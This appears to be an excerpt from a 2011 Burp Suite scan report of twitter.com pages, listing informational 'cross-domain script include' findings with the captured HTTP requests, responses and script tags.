<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296263125" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296263125" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296263125" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/geov1.js?1296263125" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/api.js?1296263125" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296263125" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/dismissable.js?1296263125" type="text/javascript"></script>
...[SNIP]...

18.338. http://twitter.com/Late_Show previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/Late_Show

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:41:26 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265286-91074-55312
ETag: "7b5d59ba88764ae8de6aa055d6a61048"
Last-Modified: Sat, 29 Jan 2011 01:41:26 GMT
X-Runtime: 0.00803
Content-Type: text/html; charset=utf-8
Content-Length: 39032
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.339. http://twitter.com/LibertyHotel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/LibertyHotel

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296258363/javascripts/dismissable.js?1296261409
http://a0.twimg.com/a/1296258363/javascripts/geov1.js?1296261409
http://a1.twimg.com/a/1296258363/javascripts/api.js?1296261409
http://a2.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296261409
http://a2.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296261409
http://a3.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296261409
http://a3.twimg.com/a/1296258363/javascripts/twitter.js?1296261409
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:54:03 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296266043-37638-22569
ETag: "6f06fb302d73fdde5809f33e541f4c86"
Last-Modified: Sat, 29 Jan 2011 01:54:03 GMT
X-Runtime: 0.01451
Content-Type: text/html; charset=utf-8
Content-Length: 48481
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/twitter.js?1296261409" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296261409" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296261409" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296261409" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/geov1.js?1296261409" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/api.js?1296261409" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296261409" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/dismissable.js?1296261409" type="text/javascript"></script>
...[SNIP]...

18.340. http://twitter.com/Michael_Joseph previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/Michael_Joseph

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726
http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726
http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /Michael_Joseph HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:06:18 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234378-88897-28661
ETag: "3ef40dd0c0867a3d11767f65db46ddb3"
Last-Modified: Fri, 28 Jan 2011 17:06:18 GMT
X-Runtime: 0.01214
Content-Type: text/html; charset=utf-8
Content-Length: 51245
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.341. http://twitter.com/Michael_Joseph previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/Michael_Joseph

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /Michael_Joseph HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:25:39 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224739-65021-17900
ETag: "4ee6993dd58f48089b6cdab2133559a8"
Last-Modified: Fri, 28 Jan 2011 14:25:39 GMT
X-Runtime: 0.01172
Content-Type: text/html; charset=utf-8
Content-Length: 51377
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.342. http://twitter.com/Michael_Joseph/status/30390775099424770 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/Michael_Joseph/status/30390775099424770

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903
http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:32:03 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225123-34122-51661
ETag: "ad47dca48519abfdbb5a652dea242307"
Last-Modified: Fri, 28 Jan 2011 14:32:03 GMT
X-Runtime: 0.09137
Content-Type: text/html; charset=utf-8
Content-Length: 13965
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIj9odHRwOi8vdHdpdHRlci5jb20vTWljaGFlbF9K%250Ab3NlcGgvc3RhdHVzLzMwMzkwNzc1MDk5NDI0NzcwOgxjc3JmX2lkIiUxOTI0%250AM2Y5OTA4Y2E0Y2Q5NDkwMTllYmQ1MjJlMmI2YjoHaWQiJTFjOTUzNDgxYTQy%250AZmRlOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9s%250AbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOg9jcmVhdGVkX2F0%250AbCsIM07wzC0B--3e792d27f106fc164e2c66dc7fc4921ffee553f5; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.343. http://twitter.com/Michael_Joseph/status/30390775099424770 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/Michael_Joseph/status/30390775099424770

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726
http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:28:37 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224917-75373-44870
ETag: "7b489ae25bea2d0595afca259835fae7"
Last-Modified: Fri, 28 Jan 2011 14:28:37 GMT
X-Runtime: 0.04662
Content-Type: text/html; charset=utf-8
Content-Length: 13965
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIj9odHRwOi8vdHdpdHRlci5jb20vTWljaGFlbF9K%250Ab3NlcGgvc3RhdHVzLzMwMzkwNzc1MDk5NDI0NzcwOgxjc3JmX2lkIiViNWFh%250AMzYyYjVlN2NkY2M5MjE1YzdhZjdkNjRhMzgwMjoHaWQiJTFjOTUzNDgxYTQy%250AZmRlOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9s%250AbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOg9jcmVhdGVkX2F0%250AbCsIM07wzC0B--f1b68fb54f1b85d8151c7dd784fd1db4f27f519c; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.344. http://twitter.com/Michael_Joseph/status/30750905452204032 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/Michael_Joseph/status/30750905452204032

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903
http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /Michael_Joseph/status/30750905452204032 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:08:35 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234515-75932-52610
ETag: "7326481ded1d383b595ee0ec222d28b4"
Last-Modified: Fri, 28 Jan 2011 17:08:35 GMT
X-Runtime: 0.04043
Content-Type: text/html; charset=utf-8
Content-Length: 13831
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7DDoOcmV0dXJuX3RvIj9odHRwOi8vdHdpdHRlci5jb20vTWljaGFlbF9K%250Ab3NlcGgvc3RhdHVzLzMwNzUwOTA1NDUyMjA0MDMyOhVpbl9uZXdfdXNlcl9m%250AbG93MDoMY3NyZl9pZCIlYWJjNDU1YzliNDU1YmMzN2QwZmQyOWYyNmE1ZTMx%250AMWM6DHR6X25hbWUiFENlbnRyYWwgQW1lcmljYToHaWQiJTFjOTUzNDgxYTQy%250AZmRlOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9s%250AbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOg9jcmVhdGVkX2F0%250AbCsIM07wzC0B--cde2e2cb11fa89a19f184bd95f9626dd2ca9bfdc; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.345. http://twitter.com/Michael_Joseph/status/30750905452204032 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/Michael_Joseph/status/30750905452204032

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726
http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:32:03 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225123-79092-4222
ETag: "638a1028f1835fd35340e2e3ae3ae646"
Last-Modified: Fri, 28 Jan 2011 14:32:03 GMT
X-Runtime: 0.37951
Content-Type: text/html; charset=utf-8
Content-Length: 13961
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
